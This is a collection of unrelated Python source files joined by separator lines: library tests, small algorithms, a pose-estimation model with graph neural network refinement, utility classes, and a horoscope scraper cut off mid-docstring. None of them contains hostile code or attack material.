# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import pytest
from utils.generators import mk_0to1_array
import cunumeric as cn
from legate.core import LEGATE_MAX_DIM
def _outer(a_ndim, b_ndim, lib):
    """Compute ``lib.outer`` of two 1-D 0..1 ramp arrays of the given lengths."""
    lhs = mk_0to1_array(lib, (a_ndim,))
    rhs = mk_0to1_array(lib, (b_ndim,))
    return lib.outer(lhs, rhs)
@pytest.mark.parametrize("a_ndim", range(1, LEGATE_MAX_DIM + 1))
@pytest.mark.parametrize("b_ndim", range(1, LEGATE_MAX_DIM + 1))
def test_basic(a_ndim, b_ndim):
    """NumPy and cuNumeric must agree on outer() for every supported size pair."""
    expected = _outer(a_ndim, b_ndim, np)
    actual = _outer(a_ndim, b_ndim, cn)
    assert np.array_equal(expected, actual)
def test_empty():
    """Zero-length inputs: both libraries must return the same (empty) result."""
    reference = _outer(0, 0, np)
    under_test = _outer(0, 0, cn)
    assert np.array_equal(reference, under_test)
if __name__ == "__main__":
    import sys

    # Run this module's tests directly, forwarding CLI args to pytest.
    sys.exit(pytest.main(sys.argv))
|
import sys
import os
import numpy as np
import math
class BP:
    """Placeholder back-propagation network; construction only logs a message."""

    def __init__(self):
        # Only side effect: announce that the (stub) network was created.
        print("init bp")
if __name__ == '__main__':
    # Smoke test: constructing BP prints its init message.
    bp = BP()
|
#! /usr/bin/python
import sys
def solve(word):
    """Recursively reduce *word*; a single character is returned unchanged.

    NOTE(review): relies on ``word_solve`` and ``sort_letter`` which are not
    defined in this file — any word longer than one character raises
    NameError here; confirm the helpers exist elsewhere.
    """
    if len(word) != 1:
        return word_solve(sort_letter(word[0], word[1]), word[2:])
    return word
# --- Code Jam style driver (Python 2 syntax: `print T`, `xrange`) ---------
# Reads "<name>.in", writes one "Case #i: result" line per case to "<name>.out".
name = "A-large-practice"
path = ""
f = open(name + ".in", 'r')
o = open(name + ".out", 'w')
# First line of the input is the number of test cases.
T = int(f.readline().strip())
# solve() recurses once per character; raise the limit for long inputs.
sys.setrecursionlimit(1500)
# NOTE(review): Python 2 print statement — this file will not run under Python 3.
print T
for t in xrange(T):
    line = f.readline().strip()
    res = solve(line)
    s = "Case #%d: %s\n" % (t + 1, res)
    #print s
    o.write(s)
|
def write_tuples_to_file(filename, tuplelist):
    """Write one ``"first second"`` line per 2-tuple of *tuplelist* to *filename*."""
    lines = ['%s %s' % pair for pair in tuplelist]
    with open(str(filename), 'w') as handle:
        handle.write('\n'.join(lines))
def in_degree(edges):
    """Count incoming edges per target node.

    *edges* is an iterable of (source, target) pairs; returns a list of
    (node, in_degree) pairs in first-seen order of the target nodes.
    """
    counts = {}
    for _, target in edges:
        counts[target] = counts.get(target, 0) + 1
    return list(counts.items())
def mergeSort(array):
    """Sort a list of pairs ascending by their second element (merge sort).

    Returns a new sorted list; the input list is left unmodified.

    Bug fix: the original base case only handled ``len(array) == 1``, so an
    empty input recursed forever (both halves of [] are [] again) and hit
    RecursionError.  ``len(array) <= 1`` covers both trivial cases.
    """
    if len(array) <= 1:
        return array
    # Split in half and sort each half recursively.
    mid = len(array) // 2
    left = mergeSort(array[:mid])
    right = mergeSort(array[mid:])
    # Merge the two sorted halves, comparing the second tuple element.
    merged = []
    i = 0
    j = 0
    while i < len(left) and j < len(right):
        # '<' (not '<=') preserved from the original: on ties the right-hand
        # element is taken first.
        if left[i][1] < right[j][1]:
            merged.append(left[i])
            i = i + 1
        else:
            merged.append(right[j])
            j = j + 1
    # At most one half still has a (sorted) tail; append it.
    merged = merged + left[i:]
    merged = merged + right[j:]
    return merged
def recursion_reverse(sortedInDegree):
    """Return *sortedInDegree* reversed.

    WARNING: destructive — the input list is emptied via pop() as the
    recursion unwinds (same behavior as the original implementation).
    """
    if not sortedInDegree:
        # Base case: nothing left to move.
        return []
    last = sortedInDegree.pop()
    return [last] + recursion_reverse(sortedInDegree)
def looper(n, reversedTuple):
    """Collect the first *n* entries of *reversedTuple*.

    Raises IndexError when n exceeds the list length (matches the original
    index-based loop, unlike a slice which would truncate silently).
    """
    return [reversedTuple[idx] for idx in range(n)]
def nth_highest_degree(n, edges):
    """Return the *n* nodes with the highest in-degree as (node, count) pairs."""
    # In-degree of every target node in the directed edge list.
    degree_pairs = in_degree(edges)
    # Merge-sort ascending by count, then flip to descending order.
    ascending = mergeSort(degree_pairs)
    descending = list(reversed(ascending))
    # Keep only the top-n entries.
    return looper(n, descending)
|
import qrcode

# Emit one QR-code image per character of the flag: 0.jpg, 1.jpg, ...
flag = 'DISCCTF{c0d1g0s_qr_g1f}'
count = 0
for character in flag:
    qrcode.make(character).save(str(count) + ".jpg")
    count = count + 1
from config import username, api_id, api_hash
from telethon import TelegramClient
def print_to_telegram(msg):
    """Send *msg* to the user's own Telegram "Saved Messages" chat."""
    client = TelegramClient(username, api_id, api_hash)

    async def _send():
        # get_me() ensures the session is authenticated before sending.
        me = await client.get_me()
        await client.send_message('me', msg)

    with client:
        client.loop.run_until_complete(_send())
|
# ------------------------------------------------------------------------------
# CPM+GNN Pytorch Implementation
# CPN+GNN paper:
# https://arxiv.org/abs/1901.01760
# Written by Haiyang Liu (haiyangliu1997@gmail.com)
# ------------------------------------------------------------------------------
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data as data
import torch.utils.model_zoo as model_zoo
from torch.autograd import Variable
from torch.nn import init
import torch_geometric.transforms as T
from torch_geometric.nn import GCNConv,GatedGraphConv
from torch_geometric.data import Data
# Skeleton connectivity over the body keypoints (nodes 0..17): every edge is
# listed in both directions, as torch_geometric's message passing expects.
edge_ = torch.tensor([[0,1],[1,0],[1,2],[2,1],[2,3],[3,2],
                      [3,4], [4,3],[2,4],[4,2],[1,5],[5,1],
                      [5,6],[6,5],[6,7],[7,6],[5,7],[7,5],
                      [1,8],[8,1],[8,9],[9,8],[9,10],[10,9],
                      [8,10],[10,8],[1,11],[11,1],[11,12],[12,11],
                      [12,13],[13,12],[11,13],[13,11],[0,14],[14,0],
                      [14,16],[16,14],[0,15],[15,0],[15,17],
                      [17,15]],dtype = torch.long)
# Transposed to shape (2, num_edges) as required by torch_geometric layers.
edge_index = edge_.t().contiguous()
# NOTE(review): CUDA is hard-coded at import time — importing this module on a
# CPU-only machine fails; confirm whether `use_gpu` should gate this instead.
device = torch.device('cuda')
edge_index = edge_index.to(device)
# paf connection
edge_paf = torch.tensor([[0,2],[2,0],[1,3],[3,1],
[2,4],[4,2],[3,5],[5,3],
[6,8],[8,6],[7,9],[9,7],
[8,10],[10,8],[9,11],[11,9],
[0,12],[12,0],[1,13],[13,1],
[12,28],[28,12],[13,29],[29,13],
[20,6],[6,20],[21,7],[7,21],
[20,28],[28,20],[21,29],[29,21],
[32,28],[28,32],[29,33],[33,29],
[30,28],[28,30],[29,31],[31,29],
[34,30],[30,34],[31,35],[35,31],
[36,32],[32,36],[33,37],[37,33],
[36,26],[26,36],[37,27],[27,37],
[20,26],[26,20],[21,27],[27,21],
[14,16],[16,14],[15,17],[17,15],
[22,24],[24,22],[23,25],[25,23],
[18,12],[18,12],[19,13],[13,19],
[34,18],[18,34],[19,35],[35,19],
[20,22],[22,21],[21,23],[23,21],
[12,14],[14,12],[13,15],[15,13]
],dtype = torch.long)
edge_index_paf = edge_paf.t().contiguous()
#device = torch.device('cuda')
edge_index_paf = edge_index_paf.to(device)
'''
def data_transform(cnn_output_one_batch):
edge_index = torch.tensor([[0,1],[1,0],[1,2],[2,1],[2,3],[3,2],
[3,4], [4,3],[2,4],[4,2],[1,5],[5,1],
[5,6],[6,5],[6,7],[7,6],[5,7],[7,5],
[1,8],[8,1],[8,9],[9,8],[9,10],[10,9],
[8,10],[10,8],[1,11],[11,1],[11,12],[12,11],
[12,13],[13,12],[11,13],[13,11],[0,14],[14,0],
[14,16],[16,14],[0,15],[15,0],[15,17],
[17,15]],dtype = torch.long)
data = Data(x = cnn_output_one_batch, edge_index = edge_index.t().contiguous())
device = torch.device('cuda')
data = data.to(device)
return data'''
class Model_GNN(nn.Module):
    ''' A GGNN module, input 19 nodes,
    CNN input size: N * 19 * H * W

    Each of the 19 heatmap channels is treated as one graph node whose
    feature vector is the flattened H*W map; 2116 assumes 46x46 maps
    (2116 = 46*46) — TODO confirm input resolution.
    '''
    def __init__(self, Gnn_layers, use_gpu):
        super().__init__()
        # One gated graph conv per requested layer; feature size fixed at 2116.
        self.gnn_layers = nn.ModuleList([GatedGraphConv(2116, 2) for l in range(Gnn_layers)])
        #self.gnn_layers = nn.ModuleList([GCNConv(2116,2116) for l in range(Gnn_layers)])
        #self.gnn_actfs = nn.ModuleList([nn.LeakyReLU() for l in range(Gnn_layers)])
        self.use_gpu = use_gpu

    def forward(self, cnn_output, gnn_interations):
        # NOTE(review): `gnn_interations` is currently unused — the propagation
        # loop that consumed it is commented out below.
        N = cnn_output.size()[0]
        C = cnn_output.size()[1]
        H = cnn_output.size()[2]
        W = cnn_output.size()[3]
        # Flatten each channel's spatial map into a node feature vector.
        gnn_output = cnn_output.view(N,C,H*W)
        gnn_output_1 = gnn_output.clone()
        #gnn_output_2 = gnn_output.clone()
        #gnn_output_3 = gnn_output.clone()
        #for i in range(gnn_interations): #propagate time
        for n in range(N):# for n samples
            #gnn_input_edge = data_transform(gnn_output[n]) # change to special data structure: data
            for idx, g_layer in enumerate(self.gnn_layers):
                #gnn_out_one_batch = self.gnn_actfs[idx](g_layer(gnn_output[n], edge_index))
                # NOTE(review): every layer reads the ORIGINAL gnn_output[n],
                # so only the last layer's result survives the loop — confirm
                # whether chaining layer outputs was intended.
                gnn_out_one_batch = g_layer(gnn_output[n], edge_index)
            gnn_output_1[n] = gnn_out_one_batch
        '''
        for n in range(N):# for n samples
            #gnn_input_edge = data_transform(gnn_output[n]) # change to special data structure: data
            for idx, g_layer in enumerate(self.gnn_layers):
                gnn_out_one_batch = self.gnn_actfs[idx](g_layer(gnn_output_1[n], edge_index))
            gnn_output_2[n] = gnn_out_one_batch '''
        # Restore the original N x C x H x W layout.
        gnn_final = gnn_output_1.view(N,C,H,W)
        return gnn_final
class Model_GNN_paf(nn.Module):
    ''' A GGNN module, input 19 nodes,
    CNN input size: N * 38 * H * W

    Same structure as Model_GNN but operating on the 38 PAF channels with the
    PAF edge graph (module-level `edge_index_paf`).  NOTE(review): the
    "19 nodes" in the original docstring conflicts with the 38-channel input.
    '''
    def __init__(self, Gnn_layers, use_gpu):
        super().__init__()
        # One gated graph conv per layer; 2116 = flattened 46x46 map (assumed).
        self.gnn_layers = nn.ModuleList([GatedGraphConv(2116, 2) for l in range(Gnn_layers)])
        #self.gnn_layers = nn.ModuleList([GCNConv(2116,2116) for l in range(Gnn_layers)])
        #self.gnn_actfs = nn.ModuleList([nn.LeakyReLU() for l in range(Gnn_layers)])
        self.use_gpu = use_gpu

    def forward(self, cnn_output, gnn_interations):
        # NOTE(review): `gnn_interations` unused — propagation loop commented out.
        N = cnn_output.size()[0]
        C = cnn_output.size()[1]
        H = cnn_output.size()[2]
        W = cnn_output.size()[3]
        # Flatten each PAF channel's spatial map into a node feature vector.
        gnn_output = cnn_output.view(N,C,H*W)
        gnn_output_1 = gnn_output.clone()
        #gnn_output_2 = gnn_output.clone()
        #gnn_output_3 = gnn_output.clone()
        #for i in range(gnn_interations): #propagate time
        for n in range(N):# for n samples
            #gnn_input_edge = data_transform(gnn_output[n]) # change to special data structure: data
            for idx, g_layer in enumerate(self.gnn_layers):
                #gnn_out_one_batch = self.gnn_actfs[idx](g_layer(gnn_output[n], edge_index_paf))
                # NOTE(review): as in Model_GNN, only the last layer's output
                # is kept — layers are not chained.
                gnn_out_one_batch = g_layer(gnn_output[n], edge_index_paf)
            gnn_output_1[n] = gnn_out_one_batch
        '''
        for n in range(N):# for n samples
            #gnn_input_edge = data_transform(gnn_output[n]) # change to special data structure: data
            for idx, g_layer in enumerate(self.gnn_layers):
                gnn_out_one_batch = self.gnn_actfs[idx](g_layer(gnn_output_1[n], edge_index))
            gnn_output_2[n] = gnn_out_one_batch '''
        # Restore the original N x C x H x W layout.
        gnn_final = gnn_output_1.view(N,C,H,W)
        return gnn_final
# some founction to build cnn
def make_stages(cfg_dict):
    """Build one CPM stage as an ``nn.Sequential`` from a list of layer dicts.

    Every entry except the last becomes MaxPool2d (keys containing 'pool',
    spec [kernel, stride, padding]) or Conv2d+ReLU (spec [in, out, kernel,
    stride, padding]).  The final entry becomes a bare Conv2d prediction head
    with no activation.

    Args:
        cfg_dict: list of single-key dicts describing the layers in order.
    Returns:
        nn.Sequential containing the assembled layers.
    """
    layers = []
    for entry in cfg_dict[:-1]:
        for key, spec in entry.items():
            if 'pool' in key:
                layers.append(nn.MaxPool2d(kernel_size=spec[0], stride=spec[1],
                                           padding=spec[2]))
            else:
                layers.append(nn.Conv2d(in_channels=spec[0], out_channels=spec[1],
                                        kernel_size=spec[2], stride=spec[3],
                                        padding=spec[4]))
                layers.append(nn.ReLU(inplace=True))
    # Final entry: bare convolution (the stage's output head, no ReLU).
    head_key = list(cfg_dict[-1].keys())[0]
    head_spec = cfg_dict[-1][head_key]
    layers.append(nn.Conv2d(in_channels=head_spec[0], out_channels=head_spec[1],
                            kernel_size=head_spec[2], stride=head_spec[3],
                            padding=head_spec[4]))
    return nn.Sequential(*layers)
def make_vgg19_block(block):
    """Build the VGG-19 feature trunk as an ``nn.Sequential``.

    Each entry of *block* is a single-key dict: keys containing 'pool' map to
    MaxPool2d([kernel, stride, padding]); anything else maps to
    Conv2d([in, out, kernel, stride, padding]) followed by an in-place ReLU.
    Unlike make_stages(), the final layer here also gets a ReLU.
    """
    layers = []
    for entry in block:
        for key, spec in entry.items():
            if 'pool' in key:
                layers.append(nn.MaxPool2d(kernel_size=spec[0], stride=spec[1],
                                           padding=spec[2]))
            else:
                layers.append(nn.Conv2d(in_channels=spec[0], out_channels=spec[1],
                                        kernel_size=spec[2], stride=spec[3],
                                        padding=spec[4]))
                layers.append(nn.ReLU(inplace=True))
    return nn.Sequential(*layers)
def get_model(trunk='vgg19'):
    """Build the CPM model blocks as a dict of nn.Sequential modules.

    Args:
        trunk (str): backbone name, 'vgg19' or 'mobilenet'.
    Returns:
        dict: 'block0' (backbone, vgg19 only) plus 'block<i>_1' (PAF branch,
        38 output channels) and 'block<i>_2' (heatmap branch, 19 output
        channels) for stages i = 1..6.

    NOTE(review): for trunk='mobilenet' the block0 config is defined but never
    converted to a module, so the returned dict has no 'block0' — confirm.
    """
    blocks = {}
    # block0 is the preprocessing stage
    if trunk == 'vgg19':
        # Layer specs: conv entries are [in, out, kernel, stride, padding],
        # pool entries are [kernel, stride, padding].
        block0 = [{'conv1_1': [3, 64, 3, 1, 1]},
                  {'conv1_2': [64, 64, 3, 1, 1]},
                  {'pool1_stage1': [2, 2, 0]},
                  {'conv2_1': [64, 128, 3, 1, 1]},
                  {'conv2_2': [128, 128, 3, 1, 1]},
                  {'pool2_stage1': [2, 2, 0]},
                  {'conv3_1': [128, 256, 3, 1, 1]},
                  {'conv3_2': [256, 256, 3, 1, 1]},
                  {'conv3_3': [256, 256, 3, 1, 1]},
                  {'conv3_4': [256, 256, 3, 1, 1]},
                  {'pool3_stage1': [2, 2, 0]},
                  {'conv4_1': [256, 512, 3, 1, 1]},
                  {'conv4_2': [512, 512, 3, 1, 1]},
                  {'conv4_3_CPM': [512, 256, 3, 1, 1]},
                  {'conv4_4_CPM': [256, 128, 3, 1, 1]}]
    elif trunk == 'mobilenet':
        block0 = [{'conv_bn': [3, 32, 2]},  # out: 3, 32, 184, 184
                  {'conv_dw1': [32, 64, 1]},  # out: 32, 64, 184, 184
                  {'conv_dw2': [64, 128, 2]},  # out: 64, 128, 92, 92
                  {'conv_dw3': [128, 128, 1]},  # out: 128, 256, 92, 92
                  {'conv_dw4': [128, 256, 2]},  # out: 256, 256, 46, 46
                  {'conv4_3_CPM': [256, 256, 1, 3, 1]},
                  {'conv4_4_CPM': [256, 128, 1, 3, 1]}]
    # Stage 1: PAF branch (L1, 38 channels) and heatmap branch (L2, 19 channels).
    blocks['block1_1'] = [{'conv5_1_CPM_L1': [128, 128, 3, 1, 1]},
                          {'conv5_2_CPM_L1': [128, 128, 3, 1, 1]},
                          {'conv5_3_CPM_L1': [128, 128, 3, 1, 1]},
                          {'conv5_4_CPM_L1': [128, 512, 1, 1, 0]},
                          {'conv5_5_CPM_L1': [512, 38, 1, 1, 0]}]
    blocks['block1_2'] = [{'conv5_1_CPM_L2': [128, 128, 3, 1, 1]},
                          {'conv5_2_CPM_L2': [128, 128, 3, 1, 1]},
                          {'conv5_3_CPM_L2': [128, 128, 3, 1, 1]},
                          {'conv5_4_CPM_L2': [128, 512, 1, 1, 0]},
                          {'conv5_5_CPM_L2': [512, 19, 1, 1, 0]}]
    # Stages 2 - 6: refinement stages; 185 input channels = 38 + 19 + 128
    # (previous PAF + heatmap predictions concatenated with block0 features).
    for i in range(2, 7):
        blocks['block%d_1' % i] = [
            {'Mconv1_stage%d_L1' % i: [185, 128, 7, 1, 3]},
            {'Mconv2_stage%d_L1' % i: [128, 128, 7, 1, 3]},
            {'Mconv3_stage%d_L1' % i: [128, 128, 7, 1, 3]},
            {'Mconv4_stage%d_L1' % i: [128, 128, 7, 1, 3]},
            {'Mconv5_stage%d_L1' % i: [128, 128, 7, 1, 3]},
            {'Mconv6_stage%d_L1' % i: [128, 128, 1, 1, 0]},
            {'Mconv7_stage%d_L1' % i: [128, 38, 1, 1, 0]}
        ]
        blocks['block%d_2' % i] = [
            {'Mconv1_stage%d_L2' % i: [185, 128, 7, 1, 3]},
            {'Mconv2_stage%d_L2' % i: [128, 128, 7, 1, 3]},
            {'Mconv3_stage%d_L2' % i: [128, 128, 7, 1, 3]},
            {'Mconv4_stage%d_L2' % i: [128, 128, 7, 1, 3]},
            {'Mconv5_stage%d_L2' % i: [128, 128, 7, 1, 3]},
            {'Mconv6_stage%d_L2' % i: [128, 128, 1, 1, 0]},
            {'Mconv7_stage%d_L2' % i: [128, 19, 1, 1, 0]}
        ]
    models_dict = {}
    if trunk == 'vgg19':
        # NOTE(review): "Bulding" typo lives in a runtime string; left as-is here.
        print("Bulding VGG19")
        models_dict['block0'] = make_vgg19_block(block0)
    for k, v in blocks.items():
        models_dict[k] = make_stages(list(v))
    return models_dict
def use_vgg(model, model_path, trunk, weight_path):
    """Initialize *model*'s trunk weights in place.

    First tries to load a local checkpoint from *weight_path*, copying its
    tensors positionally onto the model's first state-dict entries.  If that
    fails for any reason, falls back to downloading the ImageNet-pretrained
    trunk into *model_path* and loading its first ``number_weight[trunk]``
    tensors instead.

    Args:
        model: torch.nn.Module to initialize (mutated in place).
        model_path: directory used to cache downloaded weights.
        trunk: one of 'vgg16', 'ssd', 'vgg19'.
        weight_path: path of a previously saved checkpoint.
    """
    try:
        old_weights = torch.load(weight_path)
        vgg_keys = old_weights.keys()
        # Positional copy: checkpoint tensor i -> model state-dict key i
        # (weight+bias pairs, repeated).
        weights_load = {}
        for i in range(len(vgg_keys)):
            weights_load[list(model.state_dict().keys())[i]
                         ] = old_weights[list(vgg_keys)[i]]
        state = model.state_dict()
        state.update(weights_load)
        model.load_state_dict(state)
        #model.load_state_dict(old_weights)
        print('success load old weights and epoch num:')
    except Exception:
        # Bug fix: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; narrowed to Exception.
        import os  # local import: `os` is not imported at module level
        model_urls = {
            'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',
            'ssd': 'https://s3.amazonaws.com/amdegroot-models/vgg16_reducedfc.pth',
            'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth'}
        # Number of tensors (weight+bias pairs) to copy for each trunk.
        number_weight = {
            'vgg16': 18,
            'ssd': 18,
            'vgg19': 20}
        url = model_urls[trunk]
        if trunk == 'ssd':
            # Bug fix: original called `urllib.urlretrieve` (Python 2 API) with
            # `urllib` never imported, raising NameError on this path.
            from urllib.request import urlretrieve
            urlretrieve('https://s3.amazonaws.com/amdegroot-models/ssd300_mAP_77.43_v2.pth',
                        os.path.join(model_path, 'ssd.pth'))
            vgg_state_dict = torch.load(os.path.join(model_path, 'ssd.pth'))
            print('loading SSD')
        else:
            vgg_state_dict = model_zoo.load_url(url, model_dir=model_path)
        vgg_keys = vgg_state_dict.keys()
        # load weights of vgg: positional weight+bias copy as above.
        weights_load = {}
        for i in range(number_weight[trunk]):
            weights_load[list(model.state_dict().keys())[i]
                         ] = vgg_state_dict[list(vgg_keys)[i]]
        state = model.state_dict()
        state.update(weights_load)
        model.load_state_dict(state)
        print('load imagenet pretrained model: {}'.format(model_path))
class Model_CNN(nn.Module):
    """Six-stage CPM network.

    Stage 1 consumes the block0 backbone features; stages 2-6 consume the
    previous stage's PAF (branch *_1) and heatmap (branch *_2) predictions
    concatenated with the backbone features.  forward() returns the final
    stage's (paf, heatmap) pair plus every intermediate prediction for the
    multi-stage loss.
    """
    def __init__(self, model_dict):
        super(Model_CNN, self).__init__()
        # Backbone + the two prediction branches of each of the six stages.
        self.model0 = model_dict['block0']
        self.model1_1 = model_dict['block1_1']
        self.model2_1 = model_dict['block2_1']
        self.model3_1 = model_dict['block3_1']
        self.model4_1 = model_dict['block4_1']
        self.model5_1 = model_dict['block5_1']
        self.model6_1 = model_dict['block6_1']
        self.model1_2 = model_dict['block1_2']
        self.model2_2 = model_dict['block2_2']
        self.model3_2 = model_dict['block3_2']
        self.model4_2 = model_dict['block4_2']
        self.model5_2 = model_dict['block5_2']
        self.model6_2 = model_dict['block6_2']
        self._initialize_weights_norm()

    def forward(self, x):
        # Collected in stage order: (paf_i, heatmap_i) for i = 1..6.
        saved_for_loss = []
        out1 = self.model0(x)
        out1_1 = self.model1_1(out1)
        out1_2 = self.model1_2(out1)
        # Each refinement stage sees [paf, heatmap, backbone features].
        out2 = torch.cat([out1_1, out1_2, out1], 1)
        saved_for_loss.append(out1_1)
        saved_for_loss.append(out1_2)
        out2_1 = self.model2_1(out2)
        out2_2 = self.model2_2(out2)
        out3 = torch.cat([out2_1, out2_2, out1], 1)
        saved_for_loss.append(out2_1)
        saved_for_loss.append(out2_2)
        out3_1 = self.model3_1(out3)
        out3_2 = self.model3_2(out3)
        out4 = torch.cat([out3_1, out3_2, out1], 1)
        saved_for_loss.append(out3_1)
        saved_for_loss.append(out3_2)
        out4_1 = self.model4_1(out4)
        out4_2 = self.model4_2(out4)
        out5 = torch.cat([out4_1, out4_2, out1], 1)
        saved_for_loss.append(out4_1)
        saved_for_loss.append(out4_2)
        out5_1 = self.model5_1(out5)
        out5_2 = self.model5_2(out5)
        out6 = torch.cat([out5_1, out5_2, out1], 1)
        saved_for_loss.append(out5_1)
        saved_for_loss.append(out5_2)
        out6_1 = self.model6_1(out6)
        out6_2 = self.model6_2(out6)
        saved_for_loss.append(out6_1)
        saved_for_loss.append(out6_2)
        return (out6_1, out6_2), saved_for_loss

    def _initialize_weights_norm(self):
        # Default init for all convolutions: N(0, 0.01) weights, zero bias.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                init.normal_(m.weight, std=0.01)
                if m.bias is not None:  # mobilenet conv2d doesn't add bias
                    init.constant_(m.bias, 0.0)
        # last layer of these block don't have Relu
        # (index 8 for stage-1 branches / 12 for stages 2-6 is the final conv,
        # since every earlier conv is followed by a ReLU in the Sequential).
        init.normal_(self.model1_1[8].weight, std=0.01)
        init.normal_(self.model1_2[8].weight, std=0.01)
        init.normal_(self.model2_1[12].weight, std=0.01)
        init.normal_(self.model3_1[12].weight, std=0.01)
        init.normal_(self.model4_1[12].weight, std=0.01)
        init.normal_(self.model5_1[12].weight, std=0.01)
        init.normal_(self.model6_1[12].weight, std=0.01)
        init.normal_(self.model2_2[12].weight, std=0.01)
        init.normal_(self.model3_2[12].weight, std=0.01)
        init.normal_(self.model4_2[12].weight, std=0.01)
        init.normal_(self.model5_2[12].weight, std=0.01)
        init.normal_(self.model6_2[12].weight, std=0.01)
class Model_Total(nn.Module):
    """CPM CNN backbone optionally refined by residual heatmap/PAF GNNs."""

    def __init__(self, model_dict, gnn_layers, use_gpu):
        super().__init__()
        self.cnn = Model_CNN(model_dict)
        self.gnn = Model_GNN(gnn_layers, use_gpu)
        self.gnn_paf = Model_GNN_paf(gnn_layers, use_gpu)

    def forward(self, input, gnn_interations, use_gnn):
        cnn_out, saved_for_loss = self.cnn.forward(input)
        if not use_gnn:
            # GNN refinement disabled: pass the CNN predictions straight through.
            return cnn_out, saved_for_loss
        # Residual refinement: index 1 holds heatmaps, index 0 holds PAFs.
        heat_residual = self.gnn.forward(cnn_out[1].clone(), gnn_interations)
        refined_heat = cnn_out[1] + heat_residual
        paf_residual = self.gnn_paf.forward(cnn_out[0].clone(), gnn_interations)
        refined_paf = cnn_out[0] + paf_residual
        # Append as a seventh "stage" for the multi-stage loss (paf first).
        saved_for_loss.append(refined_paf)
        saved_for_loss.append(refined_heat)
        return (refined_paf, refined_heat), saved_for_loss
|
# Encode (up to) the first 15 characters of user input as a base-256 integer.
s = input("输入要转换的英文和字母")
# Only the first 15 characters are considered.
s = s[:15]
print(s)
ls = list(s)
# NOTE(review): `sum` shadows the built-in of the same name.
sum = 0
for i in range(len(ls)):
    # print(ls[i])
    # Position i is weighted by 256**(15 - i).  NOTE(review): for inputs
    # shorter than 15 characters the exponent is not adjusted to the actual
    # length — confirm 256**(len(ls) - 1 - i) was not intended.
    sum += pow(256, 15 - i) * ord(ls[i])
    # print(pow(256, 15 - i))
    # print(sum)
# Print at most the first 21 decimal digits of the result.
print("转换后的数字为:", int(str(sum)[:21]))
__author__ = 'iceke'
class Stage(object):
    """Value object describing one Spark stage's summary metrics.

    All attributes are private (name-mangled); access goes through the
    Java-style getter/setter pairs below.
    """

    def __init__(self):
        self.__stage_id = -1        # numeric stage id; -1 means unset
        self.__duration = ''        # human-readable duration string
        self.__tasks_percent = 0.0  # fraction/percentage of completed tasks
        self.__input_memory = ''    # input size as a display string
        self.__shuffle_read = ''    # shuffle-read size as a display string
        self.__shuffle_write = ''   # shuffle-write size as a display string
        self.__submit_time = ''     # submission timestamp string
        self.__gc_time = 0.0        # GC time

    def object2dict(self, obj):
        # convert object to a dict
        # NOTE: private attributes appear under their name-mangled keys,
        # e.g. '_Stage__stage_id'.
        d = {}
        d['__class__'] = obj.__class__.__name__
        d['__module__'] = obj.__module__
        d.update(obj.__dict__)
        return d

    # --- trivial accessors --------------------------------------------------
    def get_gc_time(self):
        return self.__gc_time

    def set_gc_time(self, gc_time):
        self.__gc_time = gc_time

    def get_stage_id(self):
        return self.__stage_id

    def set_stage_id(self, stage_id):
        self.__stage_id = stage_id

    def get_duration(self):
        return self.__duration

    def set_duration(self, duration):
        self.__duration = duration

    def get_tasks_percent(self):
        return self.__tasks_percent

    def set_tasks_percent(self, tasks_percent):
        self.__tasks_percent = tasks_percent

    def get_input(self):
        return self.__input_memory

    def set_input(self, input_memory):
        self.__input_memory = input_memory

    def get_shuffle_read(self):
        return self.__shuffle_read

    def set_shuffle_read(self, shuffle_read):
        self.__shuffle_read = shuffle_read

    def get_shuffle_write(self):
        return self.__shuffle_write

    def set_shuffle_write(self, shuffle_write):
        self.__shuffle_write = shuffle_write

    def get_submit_time(self):
        return self.__submit_time

    def set_submit_time(self, submit_time):
        self.__submit_time = submit_time
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import pytest
from pants.backend.codegen.soap.tailor import PutativeWsdlTargetsRequest
from pants.backend.codegen.soap.tailor import rules as tailor_rules
from pants.backend.codegen.soap.target_types import WsdlSourcesGeneratorTarget
from pants.core.goals.tailor import AllOwnedSources, PutativeTarget, PutativeTargets
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
    """RuleRunner wired with the WSDL tailor rules for goal testing."""
    all_rules = [
        *tailor_rules(),
        QueryRule(PutativeTargets, (PutativeWsdlTargetsRequest, AllOwnedSources)),
    ]
    return RuleRunner(rules=all_rules, target_types=[])
def test_find_putative_targets(rule_runner: RuleRunner) -> None:
    """Unowned .wsdl files should produce one putative wsdl_sources target."""
    rule_runner.write_files(
        {
            "src/wsdl/simple.wsdl": "",
            "src/wsdl/dir1/hello.wsdl": "",
            "src/wsdl/dir1/world.wsdl": "",
        }
    )
    request = PutativeWsdlTargetsRequest(("src/wsdl", "src/wsdl/dir1"))
    # simple.wsdl is already owned, so only dir1 should trigger a target.
    owned = AllOwnedSources(["src/wsdl/simple.wsdl"])
    pts = rule_runner.request(PutativeTargets, [request, owned])
    expected = PutativeTargets(
        [
            PutativeTarget.for_target_type(
                WsdlSourcesGeneratorTarget,
                path="src/wsdl/dir1",
                name=None,
                triggering_sources=["hello.wsdl", "world.wsdl"],
            ),
        ]
    )
    assert pts == expected
|
def coerce_url(url):
    """Normalize a feed URL to an http(s) form.

    - ``feed://`` is rewritten to ``http://``.
    - URLs already starting with http:// or https:// pass through unchanged.
    - Anything else gets an ``http://`` prefix.
    Leading/trailing whitespace is stripped first.
    """
    cleaned = url.strip()
    if cleaned.startswith("feed://"):
        return "http://{0}".format(cleaned[7:])
    if cleaned.startswith(("http://", "https://")):
        return cleaned
    return "http://{0}".format(cleaned)
|
import requests
from bs4 import BeautifulSoup
#@app.route('/star/<string:star>', methods=['GET'])
def constellation(star):
    """Scrape today's horoscope for *star* (a Chinese zodiac-sign name).

    Fetches the daily-zodiac mobile page plus a second horoscope site and
    returns a combined plain-text report.  Network I/O; no error handling —
